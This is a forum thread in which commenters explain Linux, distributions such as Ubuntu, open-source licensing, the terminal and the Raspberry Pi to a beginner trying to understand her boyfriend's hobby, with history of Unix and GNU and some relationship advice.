Organise an intervention now, before it's [too late](https://xkcd.com/456/).
A little history:

Once upon a time, before Windows™ came to be, computers required a special program required to even do basic work. This was called an operating system (OS), and you booted it from a floppy disk.

This OS contained instructions to do basic stuff like listing a folder's contents, or copying files, or editing text in a very basic way. These required you to type the commands with a keyboard (because graphical user interfaces weren't invented yet).

Computers came with a huge brick for manual that explained what these commands did.

To do work - spreadsheets, writing your homework papers, playing games - you installed new programs on top of your OS, also with floppy disks.

There were some programs that let you write your own programs - that's where the fun starts. You could make a program that let you guess a number, or tell you a story, in other words, games! Or maybe business stuff, etc.

In ye olde days, all these programs did was basic text input and output. These are called console programs. Then with some tweaking, you could paint stuff on the screen, but that required you to know the exact hardware (the video card) that was inside your machine. But I digress.

Back in the 80s, there were basically 2 different flavors of Operating Systems: Microsoft DOS, and Unix.

Both were console-only OS's.

MS DOS could only run on IBM PCs (or compatible computers).

Unix was commercial, could let many different users (each one with their own username and password) work on the same computer and required special, expensive computers. It wasn't designed for PCs.

One day, some guy called Linus said hey, let's take the best of both worlds and make a Unix for PCs! And he made a Unix compatible OS, and made it free software. That, along with some existing Unix-compatible programs that were written by another guy named Stallman, resulted in what we know as Linux (or GNU+Linux).

With time, other guys made graphical programs that ran on top of Linux and let you do stuff that you do on Windows - these are called Desktop Environments, two popular ones were GNOME and KDE. Think Coke vs Pepsi, but in software.

And some other guys made programs that did various stuff (uploading files, burning CDs, whatever), but one made it for GNOME and another made it for KDE.

And then other guys made different programs that did exactly the same thing but their own way , so keeping tabs of what was the best program for what thing was becoming complicated. Furthermore, some guys made competing programs whose goal was installing other programs, and it all became a royal mess. 

So people decided that they needed to make an all in one solution; they grabbed their favorite programs and said "This is my flavor of Linux. Here's the installer CD, just run it and voilá." These are called distros.


Think of Linux as a Lego version of software; you mix and match stuff and it helps your life get easier.

Back in the day the most popular distros were RedHat and Debian.

One day, some guy called Mark Shuttleworth decided to improve Debian and make it more user friendly; since it's open source he could tweak things his own way, and called it Ubuntu.

It was a hit.

In the end,  it's just programs running on top of the Linux "core". (it's called Kernel, BTW).

No matter what distro of Linux you have, the basic commands are the same and they do exactly the same thing - just like you'd do on an old Unix machine, because they run on top of the Linux Kernel and the GNU utilities. If you know how to run these little  programs, congratulations! You're a proficient Linux user.

The End.
> If you guys had a friend, or gf

No :(
I'd say that  doing anything with a Pi is kind of inappropriate for a new person, unless it's a more experienced person setting up a beefy Pi (Pi 4) as a cheap basic web explorer and word processor PC.

If he wants you to and/or you want to use Linux, I'd suggest just using something like Mint, Ubuntu, or ElementaryOS on a normal desktop, or if you're more into using laptops, then a laptop.

When it comes to words like "Mint" "Ubuntu" "Debian", and others (Gentoo, Manjaro, Arch, Element), those are different flavors of Linux. Mint, Ubuntu, and ElementaryOS are all in the Debian family, which tend to be a bit more user friendly, due to it's wider usage and maybe some happenstance/luck that companies/devs chose to make the more user-friendly versions off of it. Debian itself is also it's own flavor/version not just a family, but you don't really need to worry about that.

The good thing about Linux —regardless of the version you use— is that you can do "anything" you want, without worrying about some company suing you, or maybe even getting arrested. One example when compared to Apple is that on Linux you can download and run whatever you want, without it being Apple-approved. Or you can run it on any PC, unlike with Apple, that only want you running their OS on the PCs that they make. In theory Apple could sue a user for running their software on some other laptop or desktop that you own. There's none of that nonsense with Linux.

Aside from that, if all you do with computers is browse the web, and maybe use some office or e-mail programs occasionally, then you shouldn't ever notice anything different aside from the interface (things might look a bit different, you might need to click in different spots, etc.).

You don't need to know anything complicated to use basic Linux; especially when someone more computer-savvy can help you if you _do_ happen to encounter some sort of problem (although that kind of applies for any OS)
His excitement will likely be uncrushable.
It’s an empowerment thing, and a moral thing.  If we depend on companies to make our software, they don’t share the source code of the program, therefore we remain beholden to them for each fix or new feature.  If instead we support open software, the source code is available look e, and we can fix our own problems.
JUST WOW!!! The original post AND the comments are both so WHOLESOME!!!! May be the best post in this sub for a loooong time. Really enjoying all the reading and exchange of ideas.


To OP: you have some really great answers in comments so let me just say this, really cool of you to try to learn more on this and understand his excitement. My gf doesn’t care at all and is pretty blunt on saying she doesn’t want to hear anything about this, but she hates technology ahah she does find my excitement curious and when she talks to other people she praises my stuff a lot
Hey good on you for going to the effort of learning about something that he's really into. That's super cool!! My background is in this stuff, and I can assure you it's actually really fun once you get into it. It's sort of like lego, but with even more power and flexibility. 
What I'd actually recommend that you do is learn more about computers, so you're more confident and feel safer. 

Keep putting the effort in, and before you know it, you'll be playing with his stuff too! I'm sure he'd be one the moon to share this with you!
Anyway, best of luck with it. He's a lucky guy!
Let me just tell you that you have excellent taste at choosing boyfriends.
It seems like many have covered the basics so I'll add that it's a great field to be in as it is effectively what powers the internet. He could write his own software that could be run on any major companies backend, the systems doing the work behind the scenes so you can see the website, or front end. He could get into web development, the front end again, or even just learn to manage installations of other people's software. If he's looking for a career change this is a great way to get started and in my opinion extraordinarily rewarding. It's a long road though but there are so many opportunities to tackle interesting and fun problems from automation to development to security. 

Lastly I commend you for taking an interest in his passion. This isn't the common response from what I've seen; it's usually met with either disinterest or a request to fix a phone or something. 

If you want to get him small gifts they, make hats for the raspberry pi which add functionality like with extra sensors or cameras or ports he can use in his programming. If he's interested in robotics at all there's a similar hardware platform called [arduino](https://store.arduino.cc/usa/) that is also awesome. You can still use the pi for robotics but it's arguably easier to get started with the arduino.
Every smartphone and Apple device runs, at its very core, Unix. This is the system other systems run on, every cool game or useful app needs an operating system. That's Unix in this case. More, every web site needs an operating system, and it's typically Unix. Currently the most popular variety of Unix is Linux. Almost everything you interact with online is software that needs Linux to work.

Linux was a hobby project to bring Unix to inexpensive personal computers, so everyone could use it. It's free to use and copy, you don't need to pay for it if you don't want to. In addition to the operating system Linux also gets you a lot of free tools you can use to write your own programs and host your own internet services. You can literally create your own Facebook or Twitter or Gmail if you wanted to.

That's a lot of power. That's a lot of fun. It's easy to get excited about it.

Since Linux is a vast collection of tools and the operating system, it can be hard to manage them by yourself. So there are distros, short for "distributions" that collect Linux and all of its tools for ease of use, and have custom software to help you run a server or to write code and keep the system humming along. Ubuntu is one of the most popular distros, as it tends to be easier to use than others, and lets you get to work right away.
Am I your boyfriend? Got a Thinkpad this year and a Raspberry Pi for xmas.

Linux is exciting because it's the universal computer. There are no limitations with it unlike Mac or Windows which are bound legally by licenses. This means you can use Linux for any kind of project whether it be an extremely personalized desktop computer or a TV, to your router or phone.

It honestly feels amazing to use software that is developed by the community. It has staying power, it isn't dependent on a large company and it isn't freakin' spying on me lol.

That being said, it's not for everyone. If you want to just "get things done" then it probably isn't worth learning an entire computer system. But for me (a programmer), it is an essential tool and if I use a windows machine I'm pretty much lost and things don't make sense.
I am a Linux nerd to the point that I work fora Linux distro company promoting Linux use as my day job. My wife of 29 years uses computers as a tool (she is no slouch, technically-wise; she’s a Chemical Engineer).   


Those are my bona fides so that you trust what I’m about to tell you.

It is not necessary for you to be a Linux nerd just because your SO is a Linux nerd. If *you* are interested, great! But if you force yourself to learn Linux to cater to your boyfriend, you are going to resent it over time.   


My wife (and kids) do have to deal with the fact that our house is loaded with weird and complicated open-source technology that often breaks and I am the only one who can fix it. They wish theycould watch movies, listen to music, turn on the lights, and use the microwave oven like “normal people,” but I don’t demand that they share my enthusiasm. I like that they consider it an endearing and eccentric quality in me. 

So my advice to you is to affirm your boyfriend’s obsession, let him teach you a bit if you **both** like that, but make it clear that while you love his skill and enthusiasm, you are not required to do things exactly his way or always mirror every single one of his interests.
That's a very good question and thanks for posting it!  My life partner knows about the same as you regarding what Linux is or what I actually do when I work, but unlike you she prefers not to know. 

First let me start by pointing out that outside of computer science and engineering most people have no clue how a computer works. That's a shame, because in today's world a little bit of knowledge would allow you to dismiss most common scams and ensure you knew enough not to do dumb things like downloading viruses and other bad software to your phone (it's a computer btw).  I wish basic computer training was part of K-12 education - and I'm not talking about learning to program. Computers - Linux in particular - is EVERYWHERE. Not understanding how they work on a basic level means you lack understand of the world around you. Linux is what runs the world you move around in.  It's used in very small devices (even smaller than the raspberry pi) and HUGE super computers and everything in between. Android is Linux based; your TV runs Linux, your network devices run Linux, large IT departments run a lot of Linux.  And by saying Linux I'm saying they depend on computers doing important things to keep "the wheels turning". But as an end user you often just see a browser/web-page and that's just fine - understanding the exact complexities behind the browser and the internet as a whole is for the experts. But the concepts should be something you recognize and can use in casual conversations. Like when some fast speaking Indian sounding person calls you telling you "he's detected your computer is compromised".

So I'll attempt to a very basic explanation (sorry I'm not attempting to talk down to you - we all started not knowing the basics) that I think will help you.

Computers start with hardware. Hardware without software is DEAD and does nothing - together the software and hardware makes a functioning computer. Programmers then add their stuff on top of this mix. That initial software that makes the hardware work we call "An Operating System".  Linux is an operating system. It's by far not the only one out there, and Linux comes in all kinds of shapes and compositions that the world "Linux" isn't actually a very precise term. So think of Linux as the "magic" that makes the hardware into a computer. It's how your computer mouse works, how you can see files on the hard drive, play games and a lot more.

So notice I said programmers (who create software) place the software ON TOP of the software that makes the computer work?  This is what makes computer people excited about Linux - there are no restrictions on what's allowed or possible with Linux.  Why that is comes down a history lesson that would be way too long for this post.  Unix laid the ground for Linux - Unix came about mostly in academia and students since the late 70ies fell in love with it's simplicity. Until Linux came about Unix was EXPENSIVE and you could only get to it through university or work. With Linux everyone could take their 386 and get started. It was a HUGE change. 

History of Unix: [https://en.wikipedia.org/wiki/History\_of\_Unix](https://en.wikipedia.org/wiki/History_of_Unix)  
History of Linux: [https://en.wikipedia.org/wiki/History\_of\_Linux](https://en.wikipedia.org/wiki/History_of_Linux)

As an operating system Unix was revolutionary. Linux's role was to take Unix and recreate it in a way where it was free to use and to extend. Thousands of people quickly jumped on board and a few decades later it won - the wast majority of IT builds upon it, depends on it and it's still progressing getting improved, while Unix pretty much is just legacy these days.

One of the early very unique Unix things was what we call "pipelines". You can run two commands and make the output of one, go into the second one. Before Unix this was a long and complex setup - Unix/Linux makes it into:

$ ls | sort

which lists the files in the current directory and sorts them by name. Two different commands working together as one.  So with Linux you can create rather complex things with relatively simple efforts. CS students hence love it.  If you tried this with traditional mainframe control systems - well, good luck getting your answer today!

So why not Windows or MAC? They're operating systems too?  That answer really depends on understanding what's inside of these terms. You already mentioned one of the most important ones: Open.  So let me try to address that one.  Until the mid 1980ies all software cost money - a lot actually and what's funny was that until the early 1960ies all software was free as companies like IBM sold hardware, not software. Software was just required to make the hardware work. You bought a Payroll system - you bought physical hardware that came with the (free) software!  Then a light-bulb came up and we got real software companies and software took on a value of it's own. A very high value - nobody on a normal paycheck could afford it.

In the early 1980ies a man called Richard Stallman (RSK) had enough of this and rewrote ALL the basic Unix software and licensed it under a completely new type of license we today call GNU GPL (GNU General Public License). This is what makes it freely available to EVERYONE, Free as in gratis (or "free as in beer" as it's often stated) and free as in liberty (freedom). In other words, you can take this code and do WHATEVER you want to it - as long as you credit those who made the code you started from, and more important make the source available of what you create.  Now Unix is LARGE and while RSK had created a foundation and had help, it only progressed slowly.  There was no kernel when a guy called Linus Torvalds wanted to create a terminal emulator to access his university computers, and instead "accidentally" invented what we now call Linux.

What Linus created was the kernel - the stuff that talks to the hardware and makes it into a computer. Together with RSK's GNU project there was now a complete set of code to turn hardware into something that works - FOR FREE. And yes, Linus licensed Linux under GPL too (eventually). It didn't take long before hobbyist all over the world were hacking away at it.  It gave coders a powerful platform and eventually it gave corporations a much cheaper alternative to the very expensive Unix systems they had in their data-centers. These days it's replacing Windows too.

As to Windows and MAC - they not only cost money but restricts what you can do with them. There are secrets inside of them, that you're legally prevented from trying to learn. Your right to use them can be revoked and a lot more.

Take your smart TV as an example. It's smart because there's a computer inside of it. This computer has a network connection to the internet (wired or wireless) so you can stream movies to it. You can do video meetings on it, download games, it can automatically adjust itself for the best viewing experience, has advanced DSP (sound) systems to give you a theater type experience old 'dumb' TVs never could.  This is only possible because Linux makes it affordable to the consumer. If you had to pay the license fees you would have needed to with Unix TVs would cost in the thousands when they were cheap - and often with a yearly subscription fee  so you could legally keep using it!  So from a consumer perspective Linux is HUGE too - but most consumers have no clue.

So when CS type folks see Linux they typically go "WOW - this is all FREE for REAL?" and the hacking commences. It means hobbyists have a platform to make little robots and even Artificial Intelligence applications (like facial recognition). Just a decade ago this was specialized and EXPENSIVE to do.

So Linux is a platform that's free as in beer and provides the user the freedom (liberty) to do with it as they want. No restrictions. It can turn all kinds of hardware into computers; be used to control manufacturing, your TV, the internet and your phone. It's "the same" Linux with all kinds of different software on top of it.
https://linuxjourney.com

http://linuxcommand.org

https://linuxsurvival.com

the [Unix Philosophy](https://en.wikipedia.org/wiki/Unix_philosophy)

[The Cathedral And The Bazaar](http://www.catb.org/~esr/writings/cathedral-bazaar/)

[What is GNU?](https://www.gnu.org/home.en.html)

[Raspberry Pi](https://www.raspberrypi.org/)
>I know nothing. If I can use a computer or phone and it does basic tasks for me I’m all good. I currently use an iPhone and a MacBook. 

Your MacBook uses an Operating System (the software that lets you use software programs like games or web browsers (Safari, etc) on your hardware (the MacBook)) that's called MacOS. Linux is another Operating System, and there are some similarities between the two. Operating Systems allow an interface between the game/browser/etc and the hardware of the computer.


>My boyfriend is much more into programming. Recently he got an expensive Lenovo and has dove headfirst into this Linux stuff. 

As a programmer, Linux will offer certain advantages that other operating systems won't, so many programmers, but not all, use Linux.

>He tries to explain it to me. I don’t know what he’s saying! “Ubuntu,” “Free and Open,” “terminal.” 

Back in the day, someone built a basic Operating System, and decided not to charge money to use it (free). They also decided to release the code that makes up this Operating System, rather than keep it secret (open, also: "open source", as the code that makes up the operating system is called the "source code"). Ever since, this Operating System, called Linux, has been continually improved by users of Linux, in part because the source code is not a secret, and anyone can suggest or make improvements. This is in contrast to a product like MacOS, which you have to pay for, and the MacOS team at Apple are the only people who can see or improve the MacOS source code. Making an Operating System both free and open offers certain advantages, some of which are relavent to programmers, and some are philosophical.

Ubuntu is a distribution (distro) of Linux a company modified to look and act a certain way that they think is propper. A distribution is a version of Linux someone designs, usually with a goal in mind, and includes software that compliment this goal. Ubuntu was built with user-friendliness in mind, and it's a fairly approachable Operating System that works on lots of different hardware configurations, with lots of included software like web browsers and Office software. The idea behind distributions is a little like the differences between American and Japanese cars; the engines are basically the same, but some of the controls like headlight switches are in different spots, and might look different, but basically they all do the same things.

A terminal is an interface of the Operating System that only accepts, and usually only outputs, text. Ever seen an '80's movie with a computer in it and there's nothing but green text on the screen? It's a little like that. It's scary at first, but very useful. It allows a straightforward way to do things (make a file, delete a file, etc) that is independent of the Graphical User Interface, which is a higher-level, more-complex, more resource-demanding shell "over" the Operating System, and it's what I assume you are used to interacting with. This Terminal is supposed to allow users to do things on their computer regardless of what the rest of it looks like (or happens to be functioning; so it can help when things break).

> He’s got this new software that’s not google called “Brave.” 

Brave is just a web browser. Like Safari or Chrome. Google is a company that, among other things, operates a search engine service, hosts email and cloud office software (Gmail and Google Docs), and produces a web browser called Chrome.

> He got a Raspeberry Pie thing for Christmas. He’s so enamored with it, and wants to share it with me and make me use it, but he can’t explain it to me well enough for me to understand and when looking it up myself I can’t find many basic user friendly explanations either. 

A Raspberry Pie is a ~~baked pastry with a filling made of fruit and sugar~~ small, low-power hobbiest computer, a little like your iPhone, but sans battery, screen, and file storage. They're great for a wide range of uses like specific network security tasks, media players, or programming Christmas lights to blink in time with a holiday song. What's he pushing you to try with it?

> Frankly, I’m a little scared of computers. Terrified of getting hacked. Anything wonky looking on my computer scares me and sometimes Linux looks, well, creepy to me. It’s definitely my lack of knowledge. I am a complete noob. 

Go slowly. All this stuff is possible to learn, and the more you practice the easier it'll be. You also don't have to follow him down the rabbit hole if you don't want.

>If you guys had a friend, or gf, who knew nothing about Linux or ANYTHING, how would you even begin to explain it? 

See above. I would then try and be patient with their questions and answer them, trying to ascertain where their knowledge stops, and use analogies where I can. If you have any more questions for me; reply to this post.

> I want to understand the slightest bit so I don’t crush his excitement with my lack of enthusiasm.

Just listen. Ask questions. Google search terms and words you remember him using later if you want. Celebrate any accomplishments he may achieve. Buy him a mechanical keyboard for his birthday 😉
[Free[dom] software, free society](https://youtu.be/Ag1AKIl_2GM) (non-YouTube link [here](https://audio-video.gnu.org/video/TEDxGE2014_Stallman05_HQ.ogv))
A couple of the things no one has mentioned yet:

Brave: Brave is a web browser; that's the application that you use to browse the internet. You most likely use Google Chrome, or Safari, to do this. Brave is an alternative application that is more privacy-focused. Chrome is built by Google, and as such, tracks a lot of data about you and your browsing habits. Brave doesn't do this. It also has some cool features like built in ad-blocking, and I believe it even allows you to get "rewards points" for viewing certain ads, which you can spend on supporting certain individuals or organisations, like you might on Patreon. 

Raspberry Pi: A Raspberry Pi is a special little computer. It was originally developed in 2012, as a credit-card-sized, US$35 computer. Anything you can do with any computer, you can do with a Raspberry Pi... mostly. It's nowhere near as powerful as your modern laptop or even smartphone, so it can't run modern videogames, and even mundane tasks like watching YouTube might be quite slow. However, it's much smaller and cheaper than most computers, which makes it very suitable for projects where you need something like that. For example, many people have built robot cars that are controlled by a Raspberry Pi computer. Another advantage the Raspberry Pi has over most other computers, is the General Purpose Input Output, or GPIO, header. You might have noticed it has a bunch of little golden pins sticking up on one side. Those can be connected to wires, and they can power all sorts of electronic components, such as LEDs (that's Light Emitting Diode: like a light bulb, except much more advanced), motors, sensors and more. What's more, you can actually write programs to control these pins; so, you can, for example, connect a sensor that reads the temperature in the room you're in, and when it reaches a certain threshold, it lights up an LED. You could connect an ultrasonic range sensor that can tell you how far away an object is (kind of like those laser measuring tape things), mount it on your robot car, and when you get close to a wall, you stop. Getting into more advanced projects, people have connected things like cameras to the Raspberry Pi, and written very advanced software that can, for example, look at an unsolved Sudoku puzzle, and present a solution in seconds. 

Raspberry Pis come in a few different models; the regular Raspberry Pi Model B family is the most common one, while the Model A family is a bit smaller, the Zero family is smaller still (about 2.5x1 inches!), the 400 hides the computer inside a keyboard, while the Compute Module is a completely different version meant for people using them in industrial applications, where hundreds of the same gadget might be used (for example, if you design a Raspberry Pi controlled robotic arm, for a production line in a factory, where you need a couple hundred for your entire factory, you might choose the Compute Module). 

Raspberry Pi runs a version of Linux, and it's a great way to learn about Linux. If you really want to join your boyfriend in his adventures with the Pi (which I think you certainly should - quite aside from the fact that it's very sweet of you to do that, and it will make him VERY happy, it's a lot of fun if you like learning, and it's a skill that might just come in handy one day), I recommend finding one of the "Beginner Guide" books from the Raspberry Pi Press; they should be available for free online on their website, or you can buy a physical copy if you want to support the Raspberry Pi Foundation (they're actually a nonprofit and do a lot of work to improve education around the world, mainly in Computer Science/ICT with the Raspberry Pi). I recommend starting with [Raspberry Pi Beginner's Guide](https://magpi.raspberrypi.org/books/beginners-guide-4th-ed) and then maybe move on to some of the more detailed books on specific topics that interest you.
My original comment was longer than 10000 words so I split it up.  Here is part 1.

Ok, I will give this a shot.  I was around before the PC but not before computers and networks.  The Internet precedes me by about six months.  Ok, here it goes:

A computer is a collection of various bits of hardware.  Laptops (normally) have a built-in keyboard, maybe a trackpad, a monitor, and inside the case a bunch of chips that control the hardware you touch.  Without software (and, ok, firmware but that is getting ahead a bit here).. without software the hardware can't do much of anything useful so normally an operating system is required for a computer to do useful computer things for humans.

An operating system is the cohesive collection of software that talks to the hardware in the computer and provides you an interface for interacting with the computer.  Operating systems come in various flavors.  Apple computers use an in-house developed operating system called MacOS.  Most personal computers that are not Apple run an operating systems from Microsoft called all kinds of things (it used to be called, in generic terms and sometimes still is called, "Windows" and it was DOS before that).  

Linux is another operating system.  Linux is different from Microsoft and Apple's offering in many ways but the primary difference is Linux is open-source, that is the source code that is required to compile into a working operating system is free for anyone to look at, modify, and contribute to where Apple's MacOS and Microsoft's source code is closely guarded, a company secret, much like the formula for Coca-Cola or Pepsi.  You can buy Coke or Pepsi but you can't use their formula to make your own and you damn sure can't use their formula to make your own and then sell it.  

So, in short, MacOS and OSes from Microsoft are proprietary and closed source (even though these days both have open-source components you still cannot look at ALL the source code that goes into either operating system).  Linux is community driven, for the most part, and there are armies of volunteers that contribute code the Linux kernel as well as other parts of the operating system.

Here's where it gets a bit murky - Linux is the name of the kernel, that is the part of the operating system that most closely works directly with computer hardware.  The kernel provides a gatekeeper of sorts, something that the rest of the software has to talk to in order to use the hardware.  All the other software on the computer has to talk to the kernel and thus a system is created that allows a user to create something, say a spreadsheet program, and the user doesn't have to worry about how to communicate directly with the hardware chips - it just has to talk to the kernel in a way that the kernel understands and the kernel can talk back to the spreadsheet (more or less).

Now, let's take a trip down memory lane.....

In the late 1960's Bell Labs employed some of the best computer minds on the planet and it was there that a group of people started to work on a new operating system designed to run on small computers (for the time, today these things would be comically humongous).  In the beginning the computer did not have a graphical user interface but it was able to run very complex sets of instructions and could be tuned to be a number of different kinds of servers from file servers to print servers to application servers and Bell Labs named this operating system [UNIX](https://en.wikipedia.org/wiki/Unix).  AT&T was the copyright holder for the UNIX operating system developed at Bell Labs and AT&T licensed UNIX to different companies that created their own versions of UNIX and thus an entire ecosystem of computers that dominated the back-ends of networks and were the invisible hands that kept a tremendous amount of the world functioning normally even though, for the most part, it was completely invisible to the people of the world who thought things like traffic lights just did what they did magically.

Back in 1983 a man named [Richard Stallman](https://en.wikipedia.org/wiki/Richard_Stallman) said "this UNIX is powerful stuff and I would like to create a version of this operating system from scratch so that anyone can view the source code and modify it should they need to without having to pay license fees to AT&T or anyone else" and thus he created [GNU, or GNU's Not UNIX](https://en.wikipedia.org/wiki/GNU_Project).  Eventually Mr. Stallman had the compiler, lots of commands, just about everything he needed for a complete open-source UNIX-like operating system except for the kernel itself.

Enter [Linus Torvalds](https://en.wikipedia.org/wiki/Linus_Torvalds) a Finnish computer student who created an open-source kernel that when combined with the software created by the GNU projected together combined into a useable operating system.  Linus named his kernel Linux and when it was released thought it wouldn't turn into anything big but it was right place/right time to say the least.  

Today there are many companies that create versions of Linux.  A big one named [Red Hat](https://en.wikipedia.org/wiki/Red_Hat) is located just down the road from me and it was way back-in-the-day that a fellow by the name of Donnie Barnes showed me a server that was housing some of the source code for distribution on the Internet and I thought "ok.. cool?"

So, who was going to run Linux?  Good question.  Even back in the 1990s if you bought a computer it had an operating systems shipped with it (unless you built your computer from scratch components which I did usually and as a footnote from history the man I bought my computer parts from, a man named [Uzi Nissan](https://en.wikipedia.org/wiki/Nissan_Motors_v._Nissan_Computer#Uzi_Nissan), would late become entangled in a landmark lawsuit about who can own things like domain names, in this case nissan.com).  But that's neither here nor there.  Back then you bought a computer from Apple and it ran Apple's operating system.  If you bought a PC it almost always shipped with a copy of Microsoft's windows, or maybe you were a rebel and you ran [OS/2](https://en.wikipedia.org/wiki/OS/2) in which case you were my people.  But out there was Linux but what purpose did it serve beyond something that computer science majors could tinker with?

Well....... Computers that had an Intel chip inside shipped almost exclusively with Microsoft's flavor of the day but it was these same computers that could run Linux. Microsoft had a stranglehold on the Intel PC market and they did not want someone, or a company, to purchase a PC then later resell (or even give away) that same PC with their software on it.  Once the software on a PC was licensed to a company or a person it was theirs but legally they could not sell that computer to another person or in some cases reuse the same computer at their own company without first buying a new license of Windows for that computer.

And thus, a large mountain of "dead", but still usable Intel computers was created.  In 1995 I worked for a pharmaceutical company that no longer exists in name and we had a network management application that ran on a version of UNIX called [AIX](https://en.wikipedia.org/wiki/IBM_AIX) and we had a corner of the area our group occupied that had about eight monitors that displayed various graphs relating to network health.  The PCs that ran those eight monitors ran, at the time, Windows 3.1 and what was called [X-Windows](https://en.wikipedia.org/wiki/X_Window_System) which allowed the central AIX computer to display graphs natively over the network to those eight computers.

The day came when the company put its foot down and said "no more Windows 3.1, not for any reason, anywhere, anytime" and our eight computers had to be retied.  Nearing the end of the year with budgets already running on empty we didn't have money for new Windows 95 licenses along with a new version of X-Windows software for each machine so I said during a meeting "hey, I saw this Linux thing, it runs on Intel hardware and it doesn't require licenses because it is all open-source.  It's called Red Hat and I think we should try to install it and use that as our operating system."  I was very nearly laughed out the door but I insisted and was given permission only after our corporate legal department determined that, yes, we could use this software without paying anyone for it, and thus my first eight Linux computers burst forth into life on aged Intel hardware and the system ran flawlessly.

As time went on various flavors of Linux were created to run on different kinds of hardware.. [Yellow Dog Linux](https://en.wikipedia.org/wiki/Yellow_Dog_Linux) was compiled to run on PowerPC chips that were under the covers of Apple computers before their switch to Intel thus old Apple hardware could be given a second life.  And so it went on... and Linux developed into a very competent server operating system that ran some of the largest, most complex, most powerful computers of the time.
OMG I feel like all comments try to fit all bags of shopping into a Tupperware. It's impossible. Let me give you more details, it's going to be long but it will give you seas of wisdom.

Well, it's nice that you want to know about the topic here is a suggestion: look YouTube videos looking for Linux content. Almost every enthusiast starts there.  I think you may have a lot of info, let me shrink it a little more. 

We nerds or geeks of computers wants to know how gadgets and devices work. A closed/Commercial systems like the iPhone or Macs, a Windows 10 computer, an Android Phone: all the icons, bars, and things inside the screen are part of an Operating System (OS), but it is difficult in the OS to do a change because they are "Closed Source". That means that only the Company can do changes, updates to their systems.

In a Linux computer the  bunch of code you see at the start of the computer screen is the Linux Kernel. In the kernel exist  in their lines, thousands of devices that can use a Linux Kernel even if they were not supported by their companies. The Linux Kernel is constantly updated, and that's the Non-grafical interface. 

The icons, wallpaper, folder, dock, mouse cursor is the Grafical User Interface (GUI) and in computers we call it Desktop Environment (DE). In windows is called: Explorer, and in Mac: Finder. 

The GUI of Linux is known as GNU/Linux ,and DE in Linux are a lot. Gnome Shell, KDE, Pantheon, LXQT, Cinammon to start with some, and another DE are the window managers (WM) that uses less capacity of the computer to run apps smooth, Openbox, Fluxbox, Awesome, Rat Poison, JWM to name a few. 

Tip: look in google to every concept in the image search so you can have an idea.


What is so special about Linux is that with some knowledge or experience using it,  any Linux user (your boyfriend, Richard Stallman, me) can modify the system or create new apps, and people likes to share what they do. In Closed OSes that's difficult to happen. 

Another great thing about Linux is that the users decide what to install on the device they get. The devices that are sold in stores they didn't asked the customer, they just decided because they have a contract with  big tech companies. 

You can install Linux for free, the other commercial operating Systems charge their OS in the bill of the product . And if you want a legal copy, you will have to buy another license to install that system. 

Linux is almost everywhere. The computers that make Pixar movies are done in Linux servers (towers of lots of computers). Internet runs over Linux Servers too. A lot of gadgets runs Linux. 

Check the OdroidGo or the RG350p, are little gadgets that runs Linux to play old games in emulators ( another big topic) they use Opendingux Distribution. This as a present might be mindblowing. Look at them at amazon or aliexpress.

A Linux Distribution is the name that a bunch of people give the way they organize software that people can install in their devices. Ubuntu is one, and is based in Debian. I use Centos 7, that is based in RedHat. There is Manjaro that is based in Archlinux. Arch, Debian and Redhat are based in Linux. As you can see all different branches connect to a trunk. 

The creator of Linux Kernel is Linus Tordvals. 

The creator of GNU/Linux is Richard Stallman.

The grandpa of Mac and Linux is Unix. 

The terminal is a window that gives you a peak to the bones of Linux, the code itself, that to run an app, close it or make a new app to born (compile an app). Everything  is faster to do in the terminal. Even Mac has one.

The raspberry pi is a single board Computer, a green little board that some other things can be connected to it. It is the small version of a computer board. That is called a Motherboard. Even your IPhone has a SBC that attach a screen,camera, battery, etc. In the raspberry pi you can attach anything that you want (compatible with the board of course) you can create tablets, drones, robots, minicomputers, retro consoles and freedom just start there.

You can run a virtual machine like virtual box in your Mac to donwload an Linux Iso and give it a try or install Free  Software in your Mac.

Actually there is a light version of Spotify Called SpotifyQT that can be installed by "brew" in Mac. And this my friend it's just an introduction to start looking.

It is very interesting since the topic itself let you know a power that human beings can do, the power to change stuff. Look a lot of reviews, follow a lot of channels like Brian Landuke, Destination Linux, Techlore the Ubuntu Touch Q&A.
If you're really interested in learning more you could always use what's called a virtual machine or VM to try out Ubuntu for yourself. A VM is a program that you can use to try out different operating system like Ubuntu and you don't have to worry about your Mac getting a virus. I find it can be hard explaining all the stuff about Linux and sometimes it can be helpful to try it to get an understanding of it
Thank you for posting your experience. Today my wife who is 38, and has been working in the digital arts profession for 20 something years asked me today. The job I am applying for has Linux as a requirement. When she said that I laughed, because the word Linux is so broad. It would be like listing worked on cars for a auto mechanic job description.

 So Linux, mac os, and windows are all just an operating system, or interface layer to talk to the computer hardware.

I can understand your frustration when you are presented with new acronyms and tech jargon. But let me key you in to a relationship skill. Listen, ask questions, and if you can enjoy his passion for his learning experience. You do not need to be an expert in what it is he enjoys. Just listen, ask questions and share his enjoyment. 

Step 2 profit, he will fix your computer and help you become more sufficient in learning about technology. Half the stuff I do at home with computers is a mystery to my wife. But that is ok, because I make things work and she supports my hobby.
I see many folks have already gone ahead and given some fantastic answers. Just wanted to say, I think they will appreciate that you've taken the time to try and understand the Linux world. I dove headfirst in '10 and I've since converted my Parents and my Ex's Mom to the world of Linux.
Free and open refers to the “source code” of computer programs. Using a cake analogy the source code is the recipe to a cake. A free and open source program is a recipe you can find and use freely. A closed source program would be some cake you can only buy and the recipe is only known to the bakery.
Well, let me throw in my 2 cents here, and see if it contributes any. I see lot's of technical explanations, but not as much about the driving force behind why people are interested - which of course is different for everyone, but there'll likely be some common themes.

---

When using Linux, you are using something that is free (as in freedom, not as in free beer. Though very few people profit off of it) and open. This means that you have the freedom to modify stuff if you don't like it, and that you can look at all the inner workings because they are open. This is of course just fun if you're interested in computers, but there's also pragmatic reasons to like it.

When I used Windows back in the day, stuff would sometimes break. Something would randomly not work. It happens, computers are complex. But because Windows is not free to be modified, nor open so I can see what is happening, I couldn't fix it. I could re-install, or follow random guides that claimed to alleviate the symptoms (which is often did), but I could rarely be sure that the root cause was fixed.

With Linux, there aren't any such things. I can always find out what is wrong - sometimes I don't have the time to fix it, or it's not important enough for me to fix, but I can do it!

---

Now, how would I start to explain it to a genuinely curious person? Personally, I think the most interesting thing about my operating system is what it doesn't do - so I'd show them all the data MicroSoft and Apple collects. I'd show them all the weird shit you say yes to in terms and conditions. And then I'd show them how my machine is just as functional, but isn't creepy and Orwellian.
Linux looks scary because it doesn't hide it's inner workings. It's not polished like MacOS or Windows out of the box (although it can look even better through customisation).

Linux exposes the inner workings and allows the user to access the Command Line (that black screen hackers type in :P )

